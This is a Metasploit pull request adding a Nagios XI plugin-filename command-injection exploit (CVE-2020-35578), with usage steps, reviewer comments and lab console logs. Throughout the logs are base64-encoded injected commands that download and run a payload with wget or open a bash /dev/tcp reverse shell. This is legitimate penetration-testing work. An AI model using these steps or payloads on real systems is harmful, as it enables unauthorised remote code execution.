Add Nagios XI Plugins Filename Authenticate RCE module and docs (CVE-2020-35578)
rapid7/metasploit-framework pull request #14700
Opened 2021-02-01 22:55 UTC by kalba-security

## About
This changes adds a module to `modules/exploit/linux/http/` that exploits an OS command injection vulnerability  (CVE-2020-35578) in Naxios XI version 5.7.X (and possibly older versions) to achieve remote code execution as the `apache` user. The `check` method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Nagios XI version 5.7.X (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4011             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Linux

msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4011 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4012 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

2021-02-06 07:06 UTC, bcoles commented
> This changes adds a module to modules/exploit/linux/http/ that exploits an OS command injection vulnerability (CVE-2020-35578) in Naxios XI version 5.7.X (and possibly older versions)

This is exploitable since 5.4.4 and possibly earlier. It is not exploitable in 5.2.3. Unfortunately I don't have any 5.3.x systems to test.

# NagiosXI 5.6.0 (success)

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=hrjgvok7mebml9dp3bjs5vsse4;", "nagiosxi=02e1tpgvfs54afj3sr2i42teo5;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.6.7
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/8dvLNpsCRUH7i
[*] Local IP: http://10.1.1.117:8080/8dvLNpsCRUH7i
[*] Client 10.1.1.114 (Wget/1.14 (linux-gnu)) requested /8dvLNpsCRUH7i
[*] Sending payload to 10.1.1.114 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.114
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 9 opened (10.1.1.117:4444 -> 10.1.1.114:33022) at 2021-02-06 02:00:55 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9jVWtuS25sWCBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzhkdkxOcHNDUlVIN2k7Y2htb2QgK3ggL3RtcC9jVWtuS25sWDsvdG1wL2NVa25LbmxYO3JtIC1mIC90bXAvY1VrbktubFg= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.7.1908 (Linux 3.10.0-1062.1.1.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.5.0 (success)

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=bfi0lcddc20luls8km2288ofn5;", "nagiosxi=h3bhqdiknqqshcu40kadc90v25;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.5.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/BYasjRKBjTq1EZ
[*] Local IP: http://10.1.1.117:8080/BYasjRKBjTq1EZ
[*] Client 10.1.1.118 (Wget/1.14 (linux-gnu)) requested /BYasjRKBjTq1EZ
[*] Sending payload to 10.1.1.118 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.118
[*] Command Stager progress - 100.00% done (117/117 bytes)
[*] Meterpreter session 6 opened (10.1.1.117:4444 -> 10.1.1.118:37978) at 2021-02-06 01:33:20 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9YSFRVU2RRYSBodHRwOi8vMTAuMS4xLjExNzo4MDgwL0JZYXNqUktCalRxMUVaO2NobW9kICt4IC90bXAvWEhUVVNkUWE7L3RtcC9YSFRVU2RRYTtybSAtZiAvdG1wL1hIVFVTZFFh | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.3.3.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.4.10 (success)

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=d8a52ec3f16p8orucsackd0654;", "nagiosxi=2ullbdg14e5jgdq4up5a82c5f7;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.10
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/wPmv4I4BlM9z
[*] Local IP: http://10.1.1.117:8080/wPmv4I4BlM9z
[*] Client 10.1.1.112 (Wget/1.12 (linux-gnu)) requested /wPmv4I4BlM9z
[*] Sending payload to 10.1.1.112 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.112
[*] Command Stager progress - 100.00% done (115/115 bytes)
[*] Meterpreter session 5 opened (10.1.1.117:4444 -> 10.1.1.112:42600) at 2021-02-06 01:32:26 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9rZGtrWXlxSCBodHRwOi8vMTAuMS4xLjExNzo4MDgwL3dQbXY0STRCbE05ejtjaG1vZCAreCAvdG1wL2tka2tZeXFIOy90bXAva2Rra1l5cUg7cm0gLWYgL3RtcC9rZGtrWXlxSA== | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.10.2.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.4.4 (success)

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=2dncsg6qlsmeo3faaofkf4t683;", "nagiosxi=deleted;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.4.4
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/9sVlIgnTgQc7k
[*] Local IP: http://10.1.1.117:8080/9sVlIgnTgQc7k
[*] Client 10.1.1.110 (Wget/1.12 (linux-gnu)) requested /9sVlIgnTgQc7k
[*] Sending payload to 10.1.1.110 (Wget/1.12 (linux-gnu))
[*] Sending stage (980808 bytes) to 10.1.1.110
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Meterpreter session 7 opened (10.1.1.117:4444 -> 10.1.1.110:45116) at 2021-02-06 01:36:27 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9iUE55ZG1kdiBodHRwOi8vMTAuMS4xLjExNzo4MDgwLzlzVmxJZ25UZ1FjN2s7Y2htb2QgK3ggL3RtcC9iUE55ZG1kdjsvdG1wL2JQTnlkbWR2O3JtIC1mIC90bXAvYlBOeWRtZHY= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 6.9 (Linux 2.6.32-696.1.1.el6.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
```

# NagiosXI 5.2.3 (fail)

```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 10.1.1.117:4444 
[*] Executing automatic check (disable AutoCheck to override)
#<Set: {"nagiosxi=aib85nrofigutif5uknm6vrvm1;"}>
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.2.3
[+] The target appears to be vulnerable.
[-] Exploit aborted due to failure: unexpected-reply: Unexpected response received while trying to visit `/nagiosxi/admin/monitoringplugins.php`
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > 
```

2021-03-01 14:01 UTC, kalba-security commented
Nagios Xi 5.3.0 is also vulnerable, so I will assume the vulnerable range (inclusive) is 5.3.0 - 5.7.9
## Nagios XI 5.3.0 (success)
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.91.128:3423 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/Da644qIgCMel
[*] Local IP: http://192.168.91.128:8080/Da644qIgCMel
[*] Client 192.168.91.166 (Wget/1.14 (linux-gnu)) requested /Da644qIgCMel
[*] Sending payload to 192.168.91.166 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.91.166
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Meterpreter session 3 opened (192.168.91.128:3423 -> 192.168.91.166:60000) at 2021-03-01 08:59:35 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9aWEVsSUNkRSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9EYTY0NHFJZ0NNZWw7Y2htb2QgK3ggL3RtcC9aWEVsSUNkRTsvdG1wL1pYRWxJQ2RFO3JtIC1mIC90bXAvWlhFbElDZEU= | base64 -d | bash;#

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```

2021-04-01 16:21 UTC, kalba-security commented
The latest commit uses the updated mixin and updates the version and docs.
### Nagios XI 5.3.0 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosxi         yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.16     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.3.0
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/1V9MerMauwnh8
[*] Local IP: http://192.168.1.12:8080/1V9MerMauwnh8
[*] Client 192.168.1.16 (Wget/1.14 (linux-gnu)) requested /1V9MerMauwnh8
[*] Sending payload to 192.168.1.16 (Wget/1.14 (linux-gnu))
[*] Sending stage (980808 bytes) to 192.168.1.16
[*] Command Stager progress - 100.00% done (120/120 bytes)
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9hSVN5dVRtZiBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC8xVjlNZXJNYXV3bmg4O2NobW9kICt4IC90bXAvYUlTeXVUbWY7L3RtcC9hSVN5dVRtZjtybSAtZiAvdG1wL2FJU3l1VG1m | base64 -d | bash;#
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.16:54012) at 2021-04-01 12:12:35 -0400
[*] Server stopped.

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.5 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
                                              . This includes signing the license agreement.
   PASSWORD        nagiosadmin      yes       Password to authenticate with
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
                                              ax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
                                              address on the local machine or 0.0.0.0 to listen on all addresses
                                              .
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
   URIPATH                          no        The URI to use for this exploit (default is random)
   USERNAME        nagiosadmin      yes       Username to authenticate with
   VHOST                            no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   CMD


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Attempting to authenticate to Nagios XI...
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.5
[+] The target appears to be vulnerable.
[*] Executing the payload
[+] Deleted /usr/local/nagios/libexec/;echo MDwmMTcwLTtleGVjIDE3MDw+L2Rldi90Y3AvMTkyLjE2OC45MS4xMjgvNDQ0NDtzaCA8JjE3MCA+JjE3MCAyPiYxNzA= | base64 -d | bash;#
[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42834) at 2021-04-01 11:57:38 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0

2021-04-08 22:21 UTC, gwillcox-r7 requested changes

2021-04-08 22:21 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Again see discussion above, this value can actually be `nil` in the case where `login_result` is 4.

2021-04-08 22:21 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    end
This check is invalid. You said the target was vulnerable if it is between 5.3.0-5.7.9 in your module overview, yet here you are saying something like 1.3.0 would be vulnerable, which should not be the case.

2021-04-08 22:21 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    # encode the payload, which is necessary for the exploit to work
```suggestion
    # Base64 encode and ascii encode the payload, which is necessary for the exploit to work
```

2021-04-08 22:21 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    @nsp = get_nsp(res)
Sorry hate to ask this but considering how both your last module and this module have this logic, I'm curious if this shouldn't be part of either A) the mixin itself or B) a separate function.

2021-04-09 02:05 UTC, bcoles commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9hSVN5dVRtZiBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC8xVjlNZXJNYXV3bmg4O2NobW9kICt4IC90bXAvYUlTeXVUbWY7L3RtcC9hSVN5dVRtZjtybSAtZiAvdG1wL2FJU3l
This line is printed automatically by `register_file_for_cleanup` if `VERBOSE` is set to `true`.

2021-04-09 02:08 UTC, bcoles commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
> Is this user agent information useful to include or used in any way?

Why not include it? I would want to know if an EDR or Chrome browser downloaded the file. If anything other than wget downloaded the file that would be cause for alarm.

Although including it both for the `Client` line and the `Sending payload to` lines seems excessive.

2021-04-09 02:36 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
Fair point didn't consider the EDR approach, and that is a valid point to make. Also agree on the point r.e the duplication and agree that would be a good solution.

2021-04-14 16:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +Vulnerable software for testing is vavailable [here](https://assets.nagios.com/downloads/nagiosxi/versions.php).
Will be fixed in an upcoming commit.

2021-04-14 17:08 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
Appears this is actually output automatically by the `Msf::Exploit::Remote::HttpClient` mixin, therefore I'm going to mark this as resolved as this doesn't relate to this module and its providing useful information which if we wanted to minimize, would require a separate library change (and I'm not in favor of scope creep for this PR).

2021-04-14 17:20 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +that enables an authenticated admin user to achieve remote code execution as the `apache` user by uploading a malicious plugin.
Reworded this as its not technically an arbitrary file upload vuln and its more of a command injection vulnerability during plugin upload.

2021-04-14 17:42 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +Next, the module executes a base64 encoded payload via an HTTP POST request to `/admin/monitoringplugins.php`.
Reworded this now to make a bit more sense. Updates should be included in next commit.

2021-04-14 17:44 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
Reworded this a bit to make more sense but I am still concerned r.e length limitations here. I think the character limitations shouldn't be an issue though as the payload is Base64 encoded so any characters there should be encoded into an appropriate format.

2021-04-14 17:46 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +          This module exploits a vulnerability in `/admin/monitoringplugins.php` that
Well technically speaking its all versions prior to 5.8.0 if one looks at the advisory so I've updated this accordingly, along with the module name, to reflect this. Also updated the code to not try exploiting targets prior to 5.3.0, but it will still report them as vulnerable.

2021-04-14 17:47 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +      end
Right so technically speaking the only cases that we can hit in this case are 0 and 4, the other cases will be caught by the checks above. As mentioned at https://github.com/rapid7/metasploit-framework/pull/14701/files?file-filters%5B%5D=.rb#r612656355 whilst it is possible that case 4 could be encountered, at this point it is very unlikely given the checks that will have occurred previously, and if such a case does happen it would mean that something is seriously wrong with the NagiosXI install.

When login_result is 0 though, the result will be [0, [res_index.body, auth_cookies]] in which case this makes sense.

I will leave this comment here though as a warning though as if the mixin does expand and lets say option 6 is added where the second element is not an array containing at least two elements then this line will end up failing so caution is advised.

2021-04-14 17:49 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +      end
This was a misunderstanding that has since been resolved over a DM. Closing this issue as the behavior is working as intended.

2021-04-14 17:50 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +      end
https://github.com/rapid7/metasploit-framework/pull/14701/files#r612653906 for reference if more info is needed.

2021-04-14 17:50 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +      end
See https://github.com/rapid7/metasploit-framework/pull/14701/files#r612653906 for reference if more info is needed, but essentially this was a misunderstanding and this issue can be closed.

2021-04-14 17:51 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +      end
See https://github.com/rapid7/metasploit-framework/pull/14701/files#r612653906 for more info. Basically this problem is still valid but after further discussion it was determined to be unlikely to be encountered. We will still leave this issue open for future travelers though.

2021-04-14 17:52 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
Copied from https://github.com/rapid7/metasploit-framework/pull/14701/files#r612660759:

Right so technically speaking the only cases that we can hit in this case are 0 and 4, the other cases will be caught by the checks above. As mentioned at https://github.com/rapid7/metasploit-framework/pull/14701/files?file-filters%5B%5D=.rb#r612656355 whilst it is possible that case 4 could be encountered, at this point it is very unlikely given the checks that will have occurred previously, and if such a case does happen it would mean that something is seriously wrong with the NagiosXI install.

When login_result is 0 though, the result will be [0, [res_index.body, auth_cookies]] in which case this makes sense.

I will leave this comment here though as a warning though as if the mixin does expand and lets say option 6 is added where the second element is not an array containing at least two elements then this line will end up failing so caution is advised.

2021-04-14 17:53 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    end
After further review this check is correct however the module description was incorrect. I've since updated the module description accordingly and adjusted some logic to not attempt exploiting versions prior to 5.3.0.

2021-04-14 20:24 UTC, gwillcox-r7 commented on modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
> +    # encode the payload, which is necessary for the exploit to work
Comments in this area were slightly reworded to make more sense and reflect what is going on here.

2021-04-14 20:29 UTC, gwillcox-r7 commented on documentation/modules/exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce.md
> +This request creates a new plugin entry and a corresponding file in `/usr/local/nagios/libexec/` with the full payload as the name.
Alright so after looking at https://stackoverflow.com/questions/19354870/bash-command-line-and-input-limit, it seems Cygwin has a max command line limit of 32000, whilst for BSD and Linux systems it can range from 131072 to 2621440. My system personally was 2097152 so I think a reasonable limit to be on the safe side would be about 100000. Given this I highly doubt we will exceed the length limit here unless someone decides to purposefully try and break things, and this isn't an environment we would be running inside Cygwin so that limitation doesn't apply here.

Will close this out as the limit of the command line length is way higher than any reasonable payload will be in length.

2021-04-14 20:33 UTC, gwillcox-r7 commented
Alright I resolved all issues minus the two that we agreed would remain open as there is little chance of them being hit but we wanted to make people aware of the issue in case people encounter the issue in the future.

Rest will be fixed in a commit I will push up in a second, after which I will then start testing.

